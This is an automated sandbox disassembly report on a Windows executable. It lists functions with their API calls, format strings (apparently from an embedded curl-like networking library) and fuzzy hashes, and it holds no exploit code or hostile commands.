API ID: __stdio_common_vsscanf__swprintf_lstrtol
String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n
API String ID: 1923824951-723072255
Opcode ID: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
Instruction ID: 695770c312356afe0a9c9e007cacf1512f9008d73c2d1abcf3488bfe374fcac5
Opcode Fuzzy Hash: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
Instruction Fuzzy Hash: 2141B062F09A4285FB51EB66D8402F8A7B0AB45749FC44432CE6D573CADFBCE442C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE7AD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DE7C0F

Strings

%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s, xrefs: 00007FF7F1DE7BFB
9, xrefs: 00007FF7F1DE7B67
Z, xrefs: 00007FF7F1DE7B92
GMT, xrefs: 00007FF7F1DE7B97

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$9$Z
API String ID: 1992661772-2608029019
Opcode ID: c1077b3ccae57067c110648133ca7f87c2de0f9f8eaa3cbc6c890597d80ee4d6
Instruction ID: d1ef7131ce1fa31803a6b2c0c6943eebe4356d28f68cce29829104b812b3629d
Opcode Fuzzy Hash: c1077b3ccae57067c110648133ca7f87c2de0f9f8eaa3cbc6c890597d80ee4d6
Instruction Fuzzy Hash: 5041D221A0C68599EF55DF20E8541B9F7B4EB04791F948032DAAC03B98CFBCE542C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD32C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DD339C
__swprintf_l.LIBCMT ref: 00007FF7F1DD33D2

Strings

%s%s%s, xrefs: 00007FF7F1DD3391
NLST, xrefs: 00007FF7F1DD3367
LIST, xrefs: 00007FF7F1DD336E

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l_scwprintf
String ID: %s%s%s$LIST$NLST
API String ID: 1487745932-959297966
Opcode ID: 56e1939dd89dede072d4afb5a57cd00bbe0e8d4216f1c1d366f68ea2c5a5a4a4
Instruction ID: b37e1ac87598d7b9f65fb0c32bbb03ca00387a14cde6b6f170bba46dc16d5f7b
Opcode Fuzzy Hash: 56e1939dd89dede072d4afb5a57cd00bbe0e8d4216f1c1d366f68ea2c5a5a4a4
Instruction Fuzzy Hash: 92319D61A0868285EB04EB15E9442B9F3B0EB44BC5FD84032CE2D477D4DFBCE50687A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9F9B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1D9FA89
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9FAAD

Strings

://, xrefs: 00007FF7F1D9F9D0
%s/%s, xrefs: 00007FF7F1D9FA6E
%s%s, xrefs: 00007FF7F1D9FA78

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintffree
String ID: %s%s$%s/%s$://
API String ID: 4183154275-3147304931
Opcode ID: 5d6d62b624624992e386610f0545070121ca700efaae0c3f0445f1a2afe1afbf
Instruction ID: e6193c40720526a092b08341753d48f1eb93448ef1e88d80d408657f682ab26b
Opcode Fuzzy Hash: 5d6d62b624624992e386610f0545070121ca700efaae0c3f0445f1a2afe1afbf
Instruction Fuzzy Hash: 41217F11B0E64755FF19BB12A9102BAD6A1AF45BC1FDC8430DE2D07BD6EFACE40143A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD1B40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD1BFC
__swprintf_l.LIBCMT ref: 00007FF7F1DD1C21

Strings

RETR, xrefs: 00007FF7F1DD1BBB
%s %s, xrefs: 00007FF7F1DD1BF2
LIST, xrefs: 00007FF7F1DD1BCA

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %s %s$LIST$RETR
API String ID: 1488884202-469064825
Opcode ID: b272378348c2e77e80093bf10d52b766103b6ddbaf5760a7654218b70967d292
Instruction ID: c73f5b5c21d2e1371691be96d91d055862faaf0cb5a4ba01a17a973d5b875f50
Opcode Fuzzy Hash: b272378348c2e77e80093bf10d52b766103b6ddbaf5760a7654218b70967d292
Instruction Fuzzy Hash: 0C31837290CBD281E750AF6994003A9B7B8EB15BD8F984132DA6D073D1DF79D412C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA0E0C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DA0EAA

Strings

%2I64d:%02I64d:%02I64d, xrefs: 00007FF7F1DA0E99
%3I64dd %02I64dh, xrefs: 00007FF7F1DA0EE8
%7I64dd, xrefs: 00007FF7F1DA0F11

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
API String ID: 1488884202-564197712
Opcode ID: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
Instruction ID: f936b911e25f6cd3a0a9e92a197e090c64a0e49cbec40b641fb76fa782bc004a
Opcode Fuzzy Hash: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
Instruction Fuzzy Hash: 15210BD5E04B8A46DF289758680179082B9A7D5BC0FC49132DD5C0B7E6EBAC63468291

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA26E4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 206COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA28AC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA28DD

Strings

unmatched close brace/bracket, xrefs: 00007FF7F1DA29AD
out of memory, xrefs: 00007FF7F1DA28C3
too many globs, xrefs: 00007FF7F1DA29C9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: malloc
String ID: out of memory$too many globs$unmatched close brace/bracket
API String ID: 2803490479-3324938048
Opcode ID: 266369fa52bc842357ae24d428a23a31de9083f356aeed8c3cb9dde851976dc7
Instruction ID: ad6f91270a8dbcadd1f77e5fe455ca45d0cc8d9cf92f85f4ea596c55cc3892ad
Opcode Fuzzy Hash: 266369fa52bc842357ae24d428a23a31de9083f356aeed8c3cb9dde851976dc7
Instruction Fuzzy Hash: 5A91B122A08A8186FB54DB22D4403AEB7B0FB44B84F944035EEAE077D6DFBCE455D790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC2200 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32 ref: 00007FF7F1DC24D6
setsockopt.WS2_32 ref: 00007FF7F1DC24FE

Strings

Failed to alloc scratch buffer, xrefs: 00007FF7F1DC23A6
We are completely uploaded and fine, xrefs: 00007FF7F1DC25A4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
API String ID: 1903391676-2419666956
Opcode ID: f48818c3cd1f121d0d452f600084d29ed158de2b1ea44325889319649aa1c267
Instruction ID: dcfb1c97870a40ad4602346d73c8729984db2ef526acf85dc02104da5e2ebb9d
Opcode Fuzzy Hash: f48818c3cd1f121d0d452f600084d29ed158de2b1ea44325889319649aa1c267
Instruction Fuzzy Hash: FCB1B132709BC296EB69AB2595403F9E7B4FB15B84F840539DB6D037D1DFB8A061C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD61B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DD62EB

Strings

Wildcard - "%s" skipped by user, xrefs: 00007FF7F1DD63A2
Wildcard - START of "%s", xrefs: 00007FF7F1DD6310
%s%s, xrefs: 00007FF7F1DD62D0

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
API String ID: 1992661772-4272885751
Opcode ID: 02af991d7bf7902e5c3321f5894fd46bab255901b449aa500c5b398cd92056d0
Instruction ID: 50e3288eef071de0f5ea8ff34bff25c1f8220d70a940458eb4d1515c7dceaf70
Opcode Fuzzy Hash: 02af991d7bf7902e5c3321f5894fd46bab255901b449aa500c5b398cd92056d0
Instruction Fuzzy Hash: F0813032A08B4181EB55AF25D4902B877B0FB45F88F9C813ADE6D0B7D4DFB9E54487A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD02B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

recvfrom.WS2_32 ref: 00007FF7F1DD031C

Strings

TFTP error: %s, xrefs: 00007FF7F1DD0448
Received too short packet, xrefs: 00007FF7F1DD035E
Internal error: Unexpected packet, xrefs: 00007FF7F1DD04DB

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: recvfrom
String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
API String ID: 846543921-343195773
Opcode ID: 20a3a2e2451dae38da0da171d87dad50e3fe7089adee5e492f5f1e8c9621b316
Instruction ID: 30f5c1454633c7efa7a6c673c69ff6e54500749f61fe6f793b7a7e954ddbe600
Opcode Fuzzy Hash: 20a3a2e2451dae38da0da171d87dad50e3fe7089adee5e492f5f1e8c9621b316
Instruction Fuzzy Hash: BE513672A0868286EB58EB25D1507BDB7B0FB84780F848135EB6E437C4DFADE514C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE7CF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

%s%lx, xrefs: 00007FF7F1DE7DEB
TRUE, xrefs: 00007FF7F1DE7E0C
FALSE, xrefs: 00007FF7F1DE7E13

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: %s%lx$FALSE$TRUE
API String ID: 0-3905555377
Opcode ID: 53a362bee6a7a0be9ad033863c2304cc63de153dac9a131ca275140fe439ec12
Instruction ID: a42e731ce74b621d59d79ca77bc6fea96e58aef288acd53bd63387b94f3d7064
Opcode Fuzzy Hash: 53a362bee6a7a0be9ad033863c2304cc63de153dac9a131ca275140fe439ec12
Instruction Fuzzy Hash: B2419562A0854781EFEDBB2DD5640389771AB45F86FD48036C62E027D4CFADE944C3E2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA8EE4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA8F2C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA8F3A
__swprintf_l.LIBCMT ref: 00007FF7F1DA906E

Strings

%u.%u.%u.%u, xrefs: 00007FF7F1DA905F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l_errnostrtoul
String ID: %u.%u.%u.%u
API String ID: 3822977173-1542503432
Opcode ID: 1f30ee1e9ff87b2e4371e72a35b9e96df50a113ad7cb5ef3248472817614dcce
Instruction ID: fc0e8ca644b5a6d845a9eda55410641509437d5cb8d21d64e38f7a40e4b3dd8a
Opcode Fuzzy Hash: 1f30ee1e9ff87b2e4371e72a35b9e96df50a113ad7cb5ef3248472817614dcce
Instruction Fuzzy Hash: 8641F733F086A24AF334DB71901047CBBB1AB407DCF944531EE6952BDACBBC95408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA13AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1406
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DA14C5
__swprintf_l.LIBCMT ref: 00007FF7F1DA14DF

Strings

\x%02x, xrefs: 00007FF7F1DA14D2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_lisprintmalloc
String ID: \x%02x
API String ID: 646383617-50714050
Opcode ID: 22c699b7bdc6f8c99bf79f02619325e5f62e9853553d1ccccfc965a1fa40d3d3
Instruction ID: c1c231a65c8c8459791727808f275c6fd9584e0a22e967ca32da48a0afc9b507
Opcode Fuzzy Hash: 22c699b7bdc6f8c99bf79f02619325e5f62e9853553d1ccccfc965a1fa40d3d3
Instruction Fuzzy Hash: CE41A115E0C69284F711AF25A900778A7B4AF18B94F944031DDBD873DAEFECA48193E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD0E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DE64F0: CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DE650C

__swprintf_l.LIBCMT ref: 00007FF7F1DD0FED
__swprintf_l.LIBCMT ref: 00007FF7F1DD1021

Strings

APOP %s %s, xrefs: 00007FF7F1DD100B
%02x, xrefs: 00007FF7F1DD0FDE

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$AcquireContextCrypt
String ID: %02x$APOP %s %s
API String ID: 1337435539-177642706
Opcode ID: 6054284bea5bebe66e8e0f7ce63c485a277c1b67b0b3e1247bff01b008063143
Instruction ID: d6ea7f2101bff3cc1815964fdd0a1ca803d8a210a6506ca8dc0e54ea62a69c07
Opcode Fuzzy Hash: 6054284bea5bebe66e8e0f7ce63c485a277c1b67b0b3e1247bff01b008063143
Instruction Fuzzy Hash: E8517022A08B4681EB54EF25E4403A9B3B0FB88B95F944131DE6E073E4CFBDE445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCC908 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DCC9B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DCCA03
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DCCA42

Strings

realm, xrefs: 00007FF7F1DCC999

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_strdup
String ID: realm
API String ID: 2653869212-4204190682
Opcode ID: 3a493681dc92efc8fdbbf39734521db5c68439b0495f61c1c317c20e1a91c94f
Instruction ID: 9afa4b718eabc887b28dd367710644381c7d1c871b08556fc45e679be34bfd7d
Opcode Fuzzy Hash: 3a493681dc92efc8fdbbf39734521db5c68439b0495f61c1c317c20e1a91c94f
Instruction Fuzzy Hash: 94410421918A8281EB24EB15E8143B9A3B0FB497C1FC41A31DBAE432C5DFBCE545C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDF388 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89encryptionCOMMON

Download Yara Rule

APIs

CertFreeCertificateContext.CRYPT32 ref: 00007FF7F1DDF4B5

Strings

schannel: Failed to read remote certificate context: %s, xrefs: 00007FF7F1DDF499
SSL: failed retrieving public key from server certificate, xrefs: 00007FF7F1DDF481
SSL: public key does not match pinned public key, xrefs: 00007FF7F1DDF470

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CertCertificateContextFree
String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: Failed to read remote certificate context: %s
API String ID: 3080675121-2322844371
Opcode ID: 07918ab8a1da18463ecb6ec68eaff277d5d3663d741ec49b574b9548fdade21f
Instruction ID: e4a21d82e57e00de6a96ca2c4a7079036c10afbbf456ce44253954b31b8e82d3
Opcode Fuzzy Hash: 07918ab8a1da18463ecb6ec68eaff277d5d3663d741ec49b574b9548fdade21f
Instruction Fuzzy Hash: 23318322A0868251EB68AB65E4403F9B370FB88BC8FC44431DD6E076C5DFACE54287E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA3688 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FF7F1DA385A,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1DA3585), ref: 00007FF7F1DA36BD
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FF7F1DA385A,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1DA3585), ref: 00007FF7F1DA3722
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FF7F1DA385A,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1DA3585), ref: 00007FF7F1DA376A

Strings

u%04x, xrefs: 00007FF7F1DA36FC

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: fputc$fputs
String ID: u%04x
API String ID: 1019900953-2707630279
Opcode ID: e7e49c0bd81e1ff7125393db5d5ca7ecadf7bf5332ea55c8bb6d0e97a00d7136
Instruction ID: 9fec0db976bbd8dbfa220dfb73e438ae4195220e516fa45efafe7363b42c36ce
Opcode Fuzzy Hash: e7e49c0bd81e1ff7125393db5d5ca7ecadf7bf5332ea55c8bb6d0e97a00d7136
Instruction Fuzzy Hash: 6A318E61D0C943A0FB68FB18A968178DA73AB55790FD44538D63E027EADFECE540D2E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE7C30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DE7CE0

Strings

GMT, xrefs: 00007FF7F1DE7C81
5, xrefs: 00007FF7F1DE7CB4
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s, xrefs: 00007FF7F1DE7CD1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
